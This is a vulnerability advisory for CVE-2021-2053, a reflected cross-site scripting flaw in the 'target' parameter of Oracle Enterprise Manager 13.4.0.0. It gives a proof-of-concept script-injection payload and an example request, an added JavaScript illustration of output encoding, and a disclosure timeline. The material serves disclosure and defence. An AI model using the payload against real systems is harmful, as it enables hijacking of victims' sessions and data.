
CVE-2021-2053

Reflected Cross-Site Scripting in "target" query parameter

6.1 (Medium)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Oracle Enterprise Manager

13.4.0.0

Jakub Sajniak and Artur Obuchowski

A Reflected Cross-Site Scripting vulnerability exists in the "target" GET parameter of OEM version 13.4.0.0. A specially crafted URL can trigger an XSS attack. A successful attack requires victim interaction (clicking on the malicious link) and can result in modifying or exfiltrating data from the affected application.

In order to exploit the vulnerability you have to append the "target" parameter to the URL with the following payload:

</script><script>alert(document.domain)</script>

Conducted tests showed that multiple endpoints process the "target" parameter.
Example request:

GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&[...REDACTED...] HTTP/1.1

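The payload opens with a closing script tag, which suggests the "target" value is reflected inside an inline script block. The following is an added example, not code from the advisory or from Oracle, showing why ordinary string quoting does not help in that context and what encoding does; the template and all function names are assumptions.

```javascript
// Added illustration, not Oracle's code. Assumption: the server reflects the
// "target" query parameter inside a string literal in an inline <script> block.

// Constructed sample: the "target" value from the example request, URL-decoded.
const SAMPLE_TARGET = decodeURIComponent(
  "%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
);

// Weak: JSON.stringify escapes quotes and backslashes but leaves "<" and "/"
// alone. The HTML parser closes the script element at the first "</script",
// before the JavaScript engine ever sees the string literal.
function renderWeak(target) {
  return "<script>var target = " + JSON.stringify(target) + ";</script>";
}

// Hardened: also emit characters that matter to the HTML parser (and the
// line separators U+2028/U+2029) as \uXXXX escapes. JavaScript decodes them
// back to the original characters, so the application sees the same value.
function jsStringForInlineScript(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderHardened(target) {
  return "<script>var target = " + jsStringForInlineScript(target) + ";</script>";
}

// Number of script start tags in the markup; more than one means the
// reflected value introduced a script element of its own.
function countScriptOpenTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Recover the value the page's script would read from the hardened markup.
function decodeHardened(html) {
  const literal = html.slice("<script>var target = ".length, -";</script>".length);
  return JSON.parse(literal);
}
```

Output encoding of this kind belongs at the point where the value is written into the response, and a Content-Security-Policy that disallows inline scripts limits the impact if an encoding step is missed.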
  • 24-09-2020 - Vulnerability reported to vendor
  • 25-09-2020 - Vendor response
  • 25-10-2020 - Vendor update
  • 24-02-2021 - Issue addressed
  • 24-04-2021 - Vendor disclosure
  • 26-04-2021 - Public disclosure